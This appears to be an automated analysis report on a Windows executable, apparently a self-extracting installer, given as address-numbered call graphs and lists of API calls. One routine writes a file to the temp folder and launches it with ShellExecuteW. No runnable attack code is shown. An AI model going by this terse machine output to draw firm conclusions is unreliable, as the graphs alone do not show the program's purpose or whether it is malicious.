9515->9513 9515->9514 9518 40dcc7 GetLastError 9515->9518 9943 402640 9515->9943 9517->9510 9518->9515 9520 40243b lstrcmpW 9519->9520 9521 40461c 9520->9521 9522 40466c 9521->9522 9524 401329 2 API calls 9521->9524 9523 40243b lstrcmpW 9522->9523 9525 40468a 9523->9525 9526 404633 9524->9526 9528 40243b lstrcmpW 9525->9528 9527 401f9d 19 API calls 9526->9527 9529 40463a 9527->9529 9531 4046a2 9528->9531 9530 40254d 2 API calls 9529->9530 9532 404643 9530->9532 9533 40243b lstrcmpW 9531->9533 9534 401329 2 API calls 9532->9534 9535 4046ba 9533->9535 9536 40465c 9534->9536 9538 40243b lstrcmpW 9535->9538 9537 401f9d 19 API calls 9536->9537 9539 404663 9537->9539 9540 4046d2 9538->9540 9541 40254d 2 API calls 9539->9541 9542 4046e9 9540->9542 9543 4046d9 lstrcmpiW 9540->9543 9541->9522 9544 40243b lstrcmpW 9542->9544 9543->9542 9545 4046ff 9544->9545 9546 40243b lstrcmpW 9545->9546 9547 40472c 9546->9547 9550 404739 9547->9550 9946 403d1f 9547->9946 9549 40243b lstrcmpW 9554 40474d 9549->9554 9550->9549 9551 40476d 9553 40243b lstrcmpW 9551->9553 9559 404780 9553->9559 9554->9551 9555 40243b lstrcmpW 9554->9555 9950 403cc6 9554->9950 9555->9554 9556 4047a0 9558 40243b lstrcmpW 9556->9558 9560 4047ac 9558->9560 9559->9556 9561 40243b lstrcmpW 9559->9561 9954 403cf7 9559->9954 9562 40243b lstrcmpW 9560->9562 9561->9559 9563 4047bd 9562->9563 9564 40243b lstrcmpW 9563->9564 9565 4047ce 9564->9565 9566 4047e4 9565->9566 9567 4047db _wtol 9565->9567 9568 40243b lstrcmpW 9566->9568 9567->9566 9569 4047f0 9568->9569 9570 404800 9569->9570 9571 4047f7 _wtol 9569->9571 9572 40243b lstrcmpW 9570->9572 9571->9570 9573 40480c 9572->9573 9574 40243b lstrcmpW 9573->9574 9575 404824 9574->9575 9576 40243b lstrcmpW 9575->9576 9577 40483c 9576->9577 9577->9265 9962 4023dd 9578->9962 9582 404045 9581->9582 9583 404088 9581->9583 9584 4012f7 2 API calls 9582->9584 9585 403b7f 19 API calls 9582->9585 9583->9245 9583->9246 9584->9582 9586 404062 SetEnvironmentVariableW ??3@YAXPAX 
9585->9586 9586->9582 9586->9583 9588 40393b 7 API calls 9587->9588 9589 403b69 9588->9589 9590 4039f6 7 API calls 9589->9590 9591 403b74 9590->9591 9592 4027c7 6 API calls 9591->9592 9593 403b7a 9592->9593 9593->9266 9739 4083b6 9593->9739 9966 408676 9594->9966 9596 404a55 ??2@YAPAXI 9597 404a64 9596->9597 9611 40dcfb 3 API calls 9597->9611 9598 404a85 9968 40a7de _EH_prolog 9598->9968 9984 40b2fc 9598->9984 9599 404a95 9600 404ab3 9599->9600 9601 404a99 9599->9601 9603 404ada ??2@YAPAXI 9600->9603 9607 403354 86 API calls 9600->9607 9602 407776 55 API calls 9601->9602 9606 404aa1 9602->9606 9604 404ae6 9603->9604 9605 404aed 9603->9605 10009 404292 9604->10009 9990 40150b 9605->9990 9606->9312 9609 404ac6 9607->9609 9609->9603 9609->9606 9611->9598 9615 402200 LoadLibraryA GetProcAddress 9614->9615 9616 4021fb 9614->9616 9617 40221b 9615->9617 9618 402223 9615->9618 9616->9410 9616->9415 9616->9416 9617->9616 9618->9617 10472 4021b9 LoadLibraryA GetProcAddress 9618->10472 9621 40661a 2 API calls 9620->9621 9622 4049af 9621->9622 9623 401f9d 19 API calls 9622->9623 9624 4049bd 9623->9624 9625 4024fc 2 API calls 9624->9625 9626 4049c7 9625->9626 9627 4049fd 9626->9627 9629 40254d ??2@YAPAXI ??3@YAXPAX 9626->9629 9628 40254d 2 API calls 9627->9628 9630 404a0a 9628->9630 9629->9626 9631 401f9d 19 API calls 9630->9631 9632 404a11 9631->9632 9633 40254d 2 API calls 9632->9633 9634 404a1b 9633->9634 9635 4073d1 21 API calls 9634->9635 9636 404a30 ??3@YAXPAX 9635->9636 9637 404a41 ctype 9636->9637 9637->9170 9639 40e8da ctype 3 API calls 9638->9639 9640 403e7e 9639->9640 9641 40e8da ctype 3 API calls 9640->9641 9642 40e943 ??3@YAXPAX 9641->9642 9642->9164 9644 40db53 2 API calls 9643->9644 9645 404ce8 9644->9645 9646 404d44 9645->9646 9648 4024fc 2 API calls 9645->9648 9647 4025ae 2 API calls 9646->9647 9649 404d4c 9647->9649 9650 404cf7 9648->9650 9651 403e86 2 API calls 9649->9651 9654 404db5 ??3@YAXPAX 9650->9654 9656 403354 86 API calls 9650->9656 9652 404d59 
9651->9652 9653 403ef6 2 API calls 9652->9653 9655 404d66 9653->9655 9668 404db1 9654->9668 9657 403ef6 2 API calls 9655->9657 9658 404d1b 9656->9658 9659 404d73 9657->9659 9658->9654 9661 40db53 2 API calls 9658->9661 9660 403ef6 2 API calls 9659->9660 9662 404d80 9660->9662 9663 404d37 9661->9663 9664 40dd5f 2 API calls 9662->9664 9663->9654 9665 404d3b ??3@YAXPAX 9663->9665 9666 404d94 9664->9666 9665->9646 9666->9654 9667 404d9d ??3@YAXPAX 9666->9667 9667->9668 9668->9229 9670 4025ae 2 API calls 9669->9670 9686 4030a8 9670->9686 9671 403301 9672 403344 ??3@YAXPAX 9671->9672 9673 40334e 9672->9673 9673->9215 9673->9221 9674 401411 ??2@YAPAXI ??3@YAXPAX 9674->9686 9676 40272e ??2@YAPAXI ??3@YAXPAX MultiByteToWideChar 9676->9686 9677 401362 2 API calls 9678 4030f3 ??3@YAXPAX ??3@YAXPAX 9677->9678 9679 403303 9678->9679 9678->9686 10480 4029c3 9679->10480 9683 40331c ??3@YAXPAX 9683->9673 9684 4031e5 strncmp 9685 4031d0 strncmp 9684->9685 9684->9686 9685->9684 9685->9686 9686->9671 9686->9674 9686->9676 9686->9677 9686->9679 9686->9684 9687 401362 2 API calls 9686->9687 9688 402640 2 API calls 9686->9688 9691 402640 ??2@YAPAXI ??3@YAXPAX 9686->9691 9693 4023dd lstrcmpW 9686->9693 9694 402f6c 7 API calls 9686->9694 9696 403330 9686->9696 9697 4032b2 lstrcmpW 9686->9697 9701 401329 2 API calls 9686->9701 10474 402986 9686->10474 10479 402425 ??3@YAXPAX ??3@YAXPAX 9686->10479 9689 403252 ??3@YAXPAX 9687->9689 9688->9685 9690 402a69 9 API calls 9689->9690 9692 403263 lstrcmpW 9690->9692 9691->9686 9692->9686 9693->9686 9694->9686 9699 402f6c 7 API calls 9696->9699 9697->9686 9698 4032c0 lstrcmpW 9697->9698 9698->9686 9700 40333c 9699->9700 10498 402425 ??3@YAXPAX ??3@YAXPAX 9700->10498 9701->9686 9704 402f86 9703->9704 9705 402f7b 9703->9705 9707 408761 4 API calls 9704->9707 10500 402668 9705->10500 9708 402f92 9707->9708 9708->9219 9709->9219 9711 4024fc 2 API calls 9710->9711 9712 40485f 9711->9712 9713 40254d 2 API calls 9712->9713 9714 40486c 9713->9714 9715 
404888 9714->9715 9716 401429 2 API calls 9714->9716 9717 40254d 2 API calls 9715->9717 9716->9714 9718 404892 9717->9718 9719 40408b 94 API calls 9718->9719 9720 40489d ??3@YAXPAX 9719->9720 9720->9265 9722 4040a2 lstrlenW 9721->9722 9723 4040ce 9721->9723 9724 401a85 4 API calls 9722->9724 9723->9265 9725 4040b8 9724->9725 9725->9722 9725->9723 9726 4040d5 9725->9726 9727 4024fc 2 API calls 9726->9727 9730 4040de 9727->9730 10505 402776 9730->10505 9731 403093 84 API calls 9732 40414c 9731->9732 9733 404156 ??3@YAXPAX ??3@YAXPAX 9732->9733 9734 40416d ??3@YAXPAX ??3@YAXPAX 9732->9734 9733->9723 9734->9723 9735->9276 9737 40661a 2 API calls 9736->9737 9738 403b48 9737->9738 9738->9263 9740 408646 9739->9740 9752 4083d5 ctype 9739->9752 9740->9272 9741 40661a 2 API calls 9741->9752 9742 40243b lstrcmpW 9742->9752 9743 40786b 23 API calls 9743->9752 9745 407674 23 API calls 9745->9752 9746 407613 23 API calls 9746->9752 9747 403b40 2 API calls 9747->9752 9748 401f9d 19 API calls 9748->9752 9749 403f48 4 API calls 9749->9752 9750 4073d1 21 API calls 9750->9752 9751 407776 55 API calls 9751->9752 9752->9740 9752->9741 9752->9742 9752->9743 9752->9745 9752->9746 9752->9747 9752->9748 9752->9749 9752->9750 9752->9751 9753 407717 25 API calls 9752->9753 9754 4073d1 21 API calls 9752->9754 10515 40744b 9752->10515 9753->9752 9755 408476 ??3@YAXPAX 9754->9755 9755->9752 9757 40243b lstrcmpW 9756->9757 9758 4082fd 9757->9758 9759 40830b 9758->9759 10519 4019f0 GetStdHandle WriteFile 9758->10519 9761 40831e 9759->9761 10520 4019f0 GetStdHandle WriteFile 9759->10520 9763 408333 9761->9763 10521 4019f0 GetStdHandle WriteFile 9761->10521 9767 408344 9763->9767 10522 4019f0 GetStdHandle WriteFile 9763->10522 9765 40243b lstrcmpW 9769 408351 9765->9769 9767->9765 9768 40835f 9771 40243b lstrcmpW 9768->9771 9769->9768 10523 4019f0 GetStdHandle WriteFile 9769->10523 9772 40836c 9771->9772 9773 40837a 9772->9773 10524 4019f0 GetStdHandle WriteFile 9772->10524 9775 40243b lstrcmpW 
9773->9775 9776 408387 9775->9776 9777 408395 9776->9777 10525 4019f0 GetStdHandle WriteFile 9776->10525 9779 40243b lstrcmpW 9777->9779 9780 4083a2 9779->9780 9781 4083b2 9780->9781 10526 4019f0 GetStdHandle WriteFile 9780->10526 9781->9266 9784 407636 9783->9784 9785 407658 9784->9785 9786 40764b 9784->9786 10530 407186 9785->10530 10527 407154 9786->10527 9789 407653 9790 4073d1 21 API calls 9789->9790 9791 407671 9790->9791 9791->9308 9793 407689 9792->9793 9794 40716d 2 API calls 9793->9794 9795 407694 9794->9795 9796 4073d1 21 API calls 9795->9796 9797 4076a5 9796->9797 9797->9308 9799 401411 2 API calls 9798->9799 9800 403f96 9799->9800 9801 402535 2 API calls 9800->9801 9802 403f9f GetTempPathW 9801->9802 9803 403fb8 9802->9803 9808 403fcf 9802->9808 9804 402535 2 API calls 9803->9804 9805 403fc3 GetTempPathW 9804->9805 9805->9808 9806 402535 2 API calls 9807 403ff2 wsprintfW 9806->9807 9807->9808 9808->9806 9809 404009 GetFileAttributesW 9808->9809 9810 40402d 9808->9810 9809->9808 9809->9810 9810->9293 9812 40787e 9811->9812 10536 40719f 9812->10536 9815 4073d1 21 API calls 9816 4078b3 9815->9816 9816->9312 9818 403e21 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9817->9818 9819 403e16 9817->9819 9818->9313 9820 402c86 16 API calls 9819->9820 9820->9818 9822 40243b lstrcmpW 9821->9822 9823 40455d 9822->9823 9824 404592 9823->9824 9825 401329 2 API calls 9823->9825 9824->9364 9826 40456c 9825->9826 9827 403b7f 19 API calls 9826->9827 9828 404572 9827->9828 9828->9824 9829 401429 2 API calls 9828->9829 9829->9824 9831 4012f7 2 API calls 9830->9831 9832 4043d4 9831->9832 9833 40254d 2 API calls 9832->9833 9834 4043df 9833->9834 9834->9353 9836 4021a9 9835->9836 9837 40218e LoadLibraryA GetProcAddress 9835->9837 9836->9410 9837->9836 9839 401411 2 API calls 9838->9839 9846 4048bc 9839->9846 9840 401329 2 API calls 9840->9846 9841 40494e 9842 404988 ??3@YAXPAX 9841->9842 9844 4048ab 3 API calls 9841->9844 9842->9363 9843 401429 2 API calls 9843->9846 9845 
404985 9844->9845 9845->9842 9846->9840 9846->9841 9846->9843 9847 40243b lstrcmpW 9846->9847 9847->9846 9849 40661a 2 API calls 9848->9849 9850 403f50 9849->9850 9851 401411 2 API calls 9850->9851 9852 403f5e 9851->9852 9852->9337 9854 404cb1 ??3@YAXPAX 9853->9854 9855 404b15 9853->9855 9857 404cb7 9854->9857 9855->9854 9856 404b29 GetDriveTypeW 9855->9856 9856->9854 9858 404b55 9856->9858 9857->9323 9859 403f85 6 API calls 9858->9859 9860 404b63 CreateFileW 9859->9860 9861 404b89 9860->9861 9862 404c7b ??3@YAXPAX ??3@YAXPAX 9860->9862 9863 401411 2 API calls 9861->9863 9862->9857 9864 404b92 9863->9864 9865 401329 2 API calls 9864->9865 9866 404b9f 9865->9866 9867 40254d 2 API calls 9866->9867 9868 404bad 9867->9868 9869 4013e2 2 API calls 9868->9869 9870 404bb9 9869->9870 9871 40254d 2 API calls 9870->9871 9872 404bc7 9871->9872 9873 40254d 2 API calls 9872->9873 9874 404bd4 9873->9874 9875 4013e2 2 API calls 9874->9875 9876 404be0 9875->9876 9877 40254d 2 API calls 9876->9877 9878 404bed 9877->9878 9879 40254d 2 API calls 9878->9879 9880 404bf6 9879->9880 9881 4013e2 2 API calls 9880->9881 9882 404c02 9881->9882 9883 40254d 2 API calls 9882->9883 9884 404c0b 9883->9884 9885 402776 3 API calls 9884->9885 9886 404c1d WriteFile ??3@YAXPAX CloseHandle 9885->9886 9887 404c4b 9886->9887 9888 404c8c 9886->9888 9887->9888 9889 404c53 SetFileAttributesW ShellExecuteW ??3@YAXPAX 9887->9889 9890 402c86 16 API calls 9888->9890 9889->9862 9891 404c94 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9890->9891 9891->9857 9901 4022b0 9892->9901 9896 401411 2 API calls 9895->9896 9897 40273a 9896->9897 9898 402772 9897->9898 9899 402535 2 API calls 9897->9899 9898->9453 9900 402757 MultiByteToWideChar 9899->9900 9900->9898 9902 4022be ??2@YAPAXI 9901->9902 9903 4022ea 9901->9903 9902->9903 9904 4022cf ??3@YAXPAX 9902->9904 9903->9453 9904->9903 9907 401ae3 9906->9907 9910 401a97 9906->9910 9907->9460 9908 401abc CharUpperW CharUpperW 9909 401af3 CharUpperW CharUpperW 9908->9909 9908->9910 
9909->9907 9910->9907 9910->9908 9911->9479 9913 403e9e 9912->9913 9914 4022b0 2 API calls 9913->9914 9915 403eac 9914->9915 9915->9493 9917 40435e 9916->9917 9918 404375 9917->9918 9919 40436a 9917->9919 9920 4025ae 2 API calls 9918->9920 9936 4025f6 9919->9936 9922 40437e 9920->9922 9923 4022b0 2 API calls 9922->9923 9924 404387 9923->9924 9926 4025f6 2 API calls 9924->9926 9925 404373 9928 403ec1 9925->9928 9927 4043b5 ??3@YAXPAX 9926->9927 9927->9925 9929 403ecd 9928->9929 9931 403ede 9928->9931 9930 4022b0 2 API calls 9929->9930 9930->9931 9931->9499 9933 403f06 9932->9933 9933->9933 9939 4022fc 9933->9939 9935 403f13 9935->9505 9937 4022b0 2 API calls 9936->9937 9938 402610 9937->9938 9938->9925 9940 402340 9939->9940 9941 402310 9939->9941 9940->9935 9942 4022b0 2 API calls 9941->9942 9942->9940 9944 4022fc 2 API calls 9943->9944 9945 40264a 9944->9945 9945->9515 9947 403d3d 9946->9947 9958 403c63 9947->9958 9951 403cd3 9950->9951 9952 403c63 _wtol 9951->9952 9953 403cf4 9952->9953 9953->9554 9955 403d04 9954->9955 9956 403c63 _wtol 9955->9956 9957 403d1c 9956->9957 9957->9559 9959 403c6d 9958->9959 9960 403c88 _wtol 9959->9960 9961 403cc1 9959->9961 9960->9959 9961->9550 9963 4023e8 9962->9963 9964 4023f4 lstrcmpW 9963->9964 9965 402411 9963->9965 9964->9963 9964->9965 9965->9268 9967 408679 9966->9967 9967->9596 9969 40a7fe 9968->9969 9970 40b2fc 11 API calls 9969->9970 9971 40a823 9970->9971 9972 40a845 9971->9972 9973 40a82c 9971->9973 10014 40cc59 _EH_prolog 9972->10014 10017 40a3fe 9973->10017 9985 40b30d 9984->9985 9989 40dcfb 3 API calls 9985->9989 9986 40b321 9987 40b331 9986->9987 10453 40b163 9986->10453 9987->9599 9989->9986 9991 40151e 9990->9991 9992 401329 2 API calls 9991->9992 9993 40152b 9992->9993 9994 401429 2 API calls 9993->9994 9995 401534 CreateThread 9994->9995 9996 401563 9995->9996 9997 401568 WaitForSingleObject 9995->9997 10466 40129c 9995->10466 9998 40786b 23 API calls 9996->9998 9999 401585 9997->9999 10000 4015b7 9997->10000 
9998->9997 10003 4015a3 9999->10003 10006 401594 9999->10006 10001 4015b3 10000->10001 10002 4015bf GetExitCodeThread 10000->10002 10001->9606 10004 4015d6 10002->10004 10005 407776 55 API calls 10003->10005 10004->10001 10004->10006 10007 401605 SetLastError 10004->10007 10005->10001 10006->10001 10008 407776 55 API calls 10006->10008 10007->10006 10008->10001 10010 401411 2 API calls 10009->10010 10011 4042ab 10010->10011 10012 401411 2 API calls 10011->10012 10013 4042b7 10012->10013 10013->9605 10025 40c9fc 10014->10025 10436 40a28e 10017->10436 10047 40a0bf 10025->10047 10181 40a030 10047->10181 10182 40e8da ctype 3 API calls 10181->10182 10183 40a039 10182->10183 10184 40e8da ctype 3 API calls 10183->10184 10185 40a041 10184->10185 10186 40e8da ctype 3 API calls 10185->10186 10187 40a049 10186->10187 10188 40e8da ctype 3 API calls 10187->10188 10189 40a051 10188->10189 10190 40e8da ctype 3 API calls 10189->10190 10191 40a059 10190->10191 10192 40e8da ctype 3 API calls 10191->10192 10193 40a061 10192->10193 10194 40e8da ctype 3 API calls 10193->10194 10195 40a06b 10194->10195 10196 40e8da ctype 3 API calls 10195->10196 10197 40a073 10196->10197 10198 40e8da ctype 3 API calls 10197->10198 10199 40a080 10198->10199 10200 40e8da ctype 3 API calls 10199->10200 10201 40a088 10200->10201 10202 40e8da ctype 3 API calls 10201->10202 10203 40a095 10202->10203 10204 40e8da ctype 3 API calls 10203->10204 10205 40a09d 10204->10205 10206 40e8da ctype 3 API calls 10205->10206 10207 40a0aa 10206->10207 10208 40e8da ctype 3 API calls 10207->10208 10209 40a0b2 10208->10209 10437 40e8da ctype 3 API calls 10436->10437 10438 40a29c 10437->10438 10454 40f0b6 GetLastError 10453->10454 10456 40b17e 10454->10456 10455 40b192 10455->9987 10456->10455 10457 40adc3 3 API calls 10456->10457 10458 40b1b6 memcpy 10457->10458 10463 40b1d9 10458->10463 10459 40b297 ??3@YAXPAX 10459->10455 10460 40b2a2 ??3@YAXPAX 10460->10455 10462 40b27a memmove 10462->10463 10463->10459 10463->10460 
10463->10462 10464 40b2ac memcpy 10463->10464 10465 40dcfb 3 API calls 10464->10465 10465->10460 10467 4012a5 10466->10467 10468 4012b8 10466->10468 10467->10468 10469 4012a7 Sleep 10467->10469 10470 4012f1 10468->10470 10471 4012e3 EndDialog 10468->10471 10469->10467 10471->10470 10473 4021db 10472->10473 10473->9617 10475 4025ae 2 API calls 10474->10475 10476 402992 10475->10476 10477 4029be 10476->10477 10478 402640 2 API calls 10476->10478 10477->9686 10478->10476 10479->9686 10481 4029d2 10480->10481 10482 4029de 10480->10482 10499 4019f0 GetStdHandle WriteFile 10481->10499 10484 4025ae 2 API calls 10482->10484 10488 4029e8 10484->10488 10485 4029d9 10497 402425 ??3@YAXPAX ??3@YAXPAX 10485->10497 10486 402a13 10487 40272e 3 API calls 10486->10487 10489 402a25 10487->10489 10488->10486 10492 402640 2 API calls 10488->10492 10490 402a33 10489->10490 10491 402a47 10489->10491 10493 407776 55 API calls 10490->10493 10494 407776 55 API calls 10491->10494 10492->10488 10495 402a42 ??3@YAXPAX ??3@YAXPAX 10493->10495 10494->10495 10495->10485 10497->9683 10498->9672 10499->10485 10501 4012f7 2 API calls 10500->10501 10502 402676 10501->10502 10503 4012f7 2 API calls 10502->10503 10504 402682 10503->10504 10504->9704 10506 4025ae 2 API calls 10505->10506 10507 402785 10506->10507 10508 4027c1 10507->10508 10511 402628 10507->10511 10508->9731 10512 402634 10511->10512 10513 40263a WideCharToMultiByte 10511->10513 10514 4022b0 2 API calls 10512->10514 10513->10508 10514->10513 10516 407456 10515->10516 10517 40745b 10515->10517 10516->9752 10517->10516 10518 4073d1 21 API calls 10517->10518 10518->10516 10519->9759 10520->9761 10521->9763 10522->9767 10523->9768 10524->9773 10525->9777 10526->9781 10528 40661a 2 API calls 10527->10528 10529 40715c 10528->10529 10529->9789 10533 40716d 10530->10533 10534 40661a 2 API calls 10533->10534 10535 407175 10534->10535 10535->9789 10537 40661a 2 API calls 10536->10537 10538 4071a7 10537->10538 10538->9815 8035 40f3f1 8038 4024e7 
8035->8038 8043 40245a 8038->8043 8041 4024f5 8042 4024f6 malloc 8044 40246a 8043->8044 8050 402466 8043->8050 8045 40247a GlobalMemoryStatusEx 8044->8045 8044->8050 8046 402488 8045->8046 8045->8050 8046->8050 8051 401f9d 8046->8051 8050->8041 8050->8042 8052 401fb4 8051->8052 8053 401fe5 GetLastError wsprintfW GetEnvironmentVariableW GetLastError 8052->8053 8057 401fdb 8052->8057 8054 402095 SetLastError 8053->8054 8055 40201d ??2@YAPAXI GetEnvironmentVariableW 8053->8055 8054->8057 8058 4020ac 8054->8058 8056 40204c GetLastError 8055->8056 8069 40207e ??3@YAXPAX 8055->8069 8059 402052 8056->8059 8056->8069 8071 407717 8057->8071 8061 4020cb lstrlenA ??2@YAPAXI 8058->8061 8078 401f47 8058->8078 8064 402081 8059->8064 8065 40205c lstrcmpiW 8059->8065 8062 402136 MultiByteToWideChar 8061->8062 8063 4020fc GetLocaleInfoW 8061->8063 8062->8057 8063->8062 8067 402123 _wtol 8063->8067 8064->8054 8068 40206b ??3@YAXPAX 8065->8068 8065->8069 8067->8062 8068->8064 8069->8064 8070 4020c1 8070->8061 8085 40661a 8071->8085 8074 40774e 8089 4073d1 8074->8089 8075 40773c IsBadReadPtr 8075->8074 8079 401f51 GetUserDefaultUILanguage 8078->8079 8080 401f95 8078->8080 8081 401f72 GetSystemDefaultUILanguage 8079->8081 8082 401f6e 8079->8082 8080->8070 8081->8080 8083 401f7e GetSystemDefaultLCID 8081->8083 8082->8070 8083->8080 8084 401f8e 8083->8084 8084->8080 8086 406643 8085->8086 8087 40666f IsWindow 8085->8087 8086->8087 8088 40664b GetSystemMetrics GetSystemMetrics 8086->8088 8087->8074 8087->8075 8088->8087 8090 407444 8089->8090 8091 4073e0 8089->8091 8090->8050 8091->8090 8101 4024fc 8091->8101 8093 4073f1 8094 4024fc 2 API calls 8093->8094 8095 4073fc 8094->8095 8105 403b7f 8095->8105 8098 403b7f 19 API calls 8099 40740e ??3@YAXPAX ??3@YAXPAX 8098->8099 8099->8090 8102 402513 8101->8102 8114 40112b 8102->8114 8104 40251e 8104->8093 8178 403880 8105->8178 8107 403b59 8119 40393b 8107->8119 8109 403b69 8142 4039f6 8109->8142 8111 403b74 8165 4027c7 8111->8165 8115 401177 
8114->8115 8116 401139 ??2@YAPAXI 8114->8116 8115->8104 8116->8115 8118 40115a 8116->8118 8117 40116f ??3@YAXPAX 8117->8115 8118->8117 8118->8118 8201 401411 8119->8201 8123 403954 8208 40254d 8123->8208 8125 403961 8126 4024fc 2 API calls 8125->8126 8127 40396e 8126->8127 8212 403805 8127->8212 8130 401362 2 API calls 8131 403992 8130->8131 8132 40254d 2 API calls 8131->8132 8133 40399f 8132->8133 8134 4024fc 2 API calls 8133->8134 8135 4039ac 8134->8135 8136 403805 3 API calls 8135->8136 8137 4039bc ??3@YAXPAX 8136->8137 8138 4024fc 2 API calls 8137->8138 8139 4039d3 8138->8139 8140 403805 3 API calls 8139->8140 8141 4039e2 ??3@YAXPAX ??3@YAXPAX 8140->8141 8141->8109 8143 401411 2 API calls 8142->8143 8144 403a04 8143->8144 8145 401362 2 API calls 8144->8145 8146 403a0f 8145->8146 8147 40254d 2 API calls 8146->8147 8148 403a1c 8147->8148 8149 4024fc 2 API calls 8148->8149 8150 403a29 8149->8150 8151 403805 3 API calls 8150->8151 8152 403a39 ??3@YAXPAX 8151->8152 8153 401362 2 API calls 8152->8153 8154 403a4d 8153->8154 8155 40254d 2 API calls 8154->8155 8156 403a5a 8155->8156 8157 4024fc 2 API calls 8156->8157 8158 403a67 8157->8158 8159 403805 3 API calls 8158->8159 8160 403a77 ??3@YAXPAX 8159->8160 8161 4024fc 2 API calls 8160->8161 8162 403a8e 8161->8162 8163 403805 3 API calls 8162->8163 8164 403a9d ??3@YAXPAX ??3@YAXPAX 8163->8164 8164->8111 8166 401411 2 API calls 8165->8166 8167 4027d5 8166->8167 8168 4027e5 ExpandEnvironmentStringsW 8167->8168 8171 40112b 2 API calls 8167->8171 8169 402809 8168->8169 8170 4027fe ??3@YAXPAX 8168->8170 8237 402535 8169->8237 8172 402840 8170->8172 8171->8168 8172->8098 8175 402824 8176 401362 2 API calls 8175->8176 8177 402838 ??3@YAXPAX 8176->8177 8177->8172 8179 401411 2 API calls 8178->8179 8180 40388e 8179->8180 8181 401362 2 API calls 8180->8181 8182 403899 8181->8182 8183 40254d 2 API calls 8182->8183 8184 4038a6 8183->8184 8185 4024fc 2 API calls 8184->8185 8186 4038b3 8185->8186 8187 403805 3 API calls 8186->8187 
8188 4038c3 ??3@YAXPAX 8187->8188 8189 401362 2 API calls 8188->8189 8190 4038d7 8189->8190 8191 40254d 2 API calls 8190->8191 8192 4038e4 8191->8192 8193 4024fc 2 API calls 8192->8193 8194 4038f1 8193->8194 8195 403805 3 API calls 8194->8195 8196 403901 ??3@YAXPAX 8195->8196 8197 4024fc 2 API calls 8196->8197 8198 403918 8197->8198 8199 403805 3 API calls 8198->8199 8200 403927 ??3@YAXPAX ??3@YAXPAX 8199->8200 8200->8107 8202 40112b 2 API calls 8201->8202 8203 401425 8202->8203 8204 401362 8203->8204 8205 40136e 8204->8205 8207 401380 8204->8207 8206 40112b 2 API calls 8205->8206 8206->8207 8207->8123 8209 40255a 8208->8209 8217 401398 8209->8217 8211 402565 8211->8125 8213 40381b 8212->8213 8214 403817 ??3@YAXPAX 8212->8214 8213->8214 8221 4026b1 8213->8221 8225 402f96 8213->8225 8214->8130 8218 4013dc 8217->8218 8219 4013ac 8217->8219 8218->8211 8220 40112b 2 API calls 8219->8220 8220->8218 8222 4026c7 8221->8222 8223 4026db 8222->8223 8229 402346 memmove 8222->8229 8223->8213 8226 402fa5 8225->8226 8228 402fbe 8226->8228 8230 4026e6 8226->8230 8228->8213 8229->8223 8231 4026f6 8230->8231 8232 401398 2 API calls 8231->8232 8233 402702 8232->8233 8236 402346 memmove 8233->8236 8235 40270f 8235->8228 8236->8235 8238 402541 8237->8238 8239 402547 ExpandEnvironmentStringsW 8237->8239 8240 40112b 2 API calls 8238->8240 8239->8175 8240->8239 11204 40e4f9 11205 40e516 11204->11205 11206 40e506 11204->11206 11209 40de46 11206->11209 11212 401b1f VirtualFree 11209->11212 11211 40de81 ??3@YAXPAX 11211->11205 11212->11211 9087 411388 ??2@YAPAXI 9088 411397 9087->9088
APIs
  • Part of subcall function 00401B37: GetModuleHandleW.KERNEL32(00000000,00000000,?,?,?,?,?,00404FBD,?,?,00000000), ref: 00401B43
  • Part of subcall function 00401B37: CreateWindowExW.USER32(00000000,Static,0041335C,00000000,000000F6,000000F6,00000005,00000005,00000000,00000000,00000000), ref: 00401B60
  • Part of subcall function 00401B37: SetTimer.USER32(00000000,00000001,00000001,00000000), ref: 00401B72
  • Part of subcall function 00401B37: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00401B7F
  • Part of subcall function 00401B37: DispatchMessageW.USER32(?), ref: 00401B89
  • Part of subcall function 00401B37: KillTimer.USER32(00000000,00000001,?,?,?,?,?,00404FBD,?,?,00000000), ref: 00401B92
  • Part of subcall function 00401B37: KiUserCallbackDispatcher.NTDLL(00000000,?,?,?,?,?,00404FBD,?,?,00000000), ref: 00401B99
• GetVersionExW.KERNEL32(?,?,?,00000000), ref: 00404FCE
• GetCommandLineW.KERNEL32(?,00000020,?,?,00000000), ref: 0040505C
  • Part of subcall function 00402A69: ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,0040507C,?,00000000), ref: 00402ADC
  • Part of subcall function 00402A69: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,0040507C,?), ref: 00402AF7
  • Part of subcall function 00402A69: ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,0040507C), ref: 00402AFF
  • Part of subcall function 00402A69: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000020,?,?,?,?,?,?,?,?,0040507C,?,00000000), ref: 00402B6F
  • Part of subcall function 00403D71: lstrlenW.KERNEL32(?,00000000,00000020,?,0040508F,?,?,00000000,?,00000000), ref: 00403DA5
  • Part of subcall function 00403D71: lstrlenW.KERNEL32(?,?,00000000), ref: 00403DAD
• _wtol.MSVCRT ref: 0040509F
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 004050F1
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405102
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 0040510A
• GetModuleFileNameW.KERNEL32(00000000,00000208,00000000,?,00000000), ref: 00405138
• _wtol.MSVCRT ref: 00405217
• ??2@YAPAXI@Z.MSVCRT(00000010,004177C4,004177C4,?,00000000), ref: 0040538F
  • Part of subcall function 00404E3F: ??3@YAXPAX@Z.MSVCRT(004177C4,004177C4,004177C4,00000000,00000024,;!@InstallEnd@!,;!@Install@!UTF-8!,00000000,00000000), ref: 00404E85
                                                                                              • Part of subcall function 00404E3F: ??3@YAXPAX@Z.MSVCRT(004177C4,004177C4,004177C4,00000000,00000024,004177C4,004177C4,00000000,00000024,;!@InstallEnd@!,;!@Install@!UTF-8!,00000000,00000000), ref: 00404EAB
                                                                                              • Part of subcall function 00404E3F: wsprintfA.USER32 ref: 00404EBC
                                                                                              • Part of subcall function 00402844: lstrlenA.KERNEL32(?,?,00000000), ref: 00402876
